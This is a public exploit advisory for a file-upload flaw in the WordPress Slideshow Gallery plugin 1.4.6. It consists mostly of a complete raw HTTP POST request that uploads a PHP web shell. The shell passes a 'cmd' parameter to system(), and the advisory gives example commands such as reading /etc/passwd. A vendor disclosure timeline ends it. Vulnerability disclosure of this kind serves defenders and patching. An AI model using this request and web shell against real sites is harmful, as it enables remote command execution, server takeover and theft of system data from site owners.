######################
# Exploit Title : WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://tribulant.com
# Software Link : http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
# Date : 2014-08-09
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description :
Any user could upload php files (administrator by default).
######################
# Location
http://127.0.0.1/wp-content/plugins/slideshow-gallery/views/admin/slides/save.php
######################
# PoC Exploit:
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wp-admin/admin.php?page=slideshow-slides&method=save&id=4
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407776360%7C538bd40b62d672bbc26a5b5d8a0cf9e5; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407776360%7Cac34ce538e8b9532559c6940a5d73c04; redux_current_tab=3
Connection=keep-alive
Content-Type=multipart/form-data; boundary=---------------------------31064175401770
Content-Length=1839
POSTDATA =-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[id]"
4
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[order]"
0
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[title]"
titolo_demo
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[description]"
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[showinfo]"
both
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[iopacity]"
70
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[type]"
file
-----------------------------31064175401770
Content-Disposition: form-data; name="image_file"; filename="shell.php"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/shell.php?cmd=cat+/etc/passwd
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[image_oldfile]"
2136.png
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[image_url]"
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[uselink]"
N
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[link]"
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[linktarget]"
self
-----------------------------31064175401770
Content-Disposition: form-data; name="submit"
Save Slide
-----------------------------31064175401770--
Backdoor location:
http://127.0.0.1/wp-content/uploads/slideshow-gallery/shell.php?cmd=pwd
PoC Video:
https://www.youtube.com/watch?v=9iuMsUFl9dM
######################
# Vulnerability Disclosure Timeline:
2014-08-09: Discovered vulnerability (1.4.5 version)
2014-08-09: Vendor Notification (Twitter)
2014-08-14: Plugin version 1.4.6 released without fix
2014-08-14: Vendor Notification (Support web page)
2014-08-15: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch (1.4.7)
2014-09-01: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################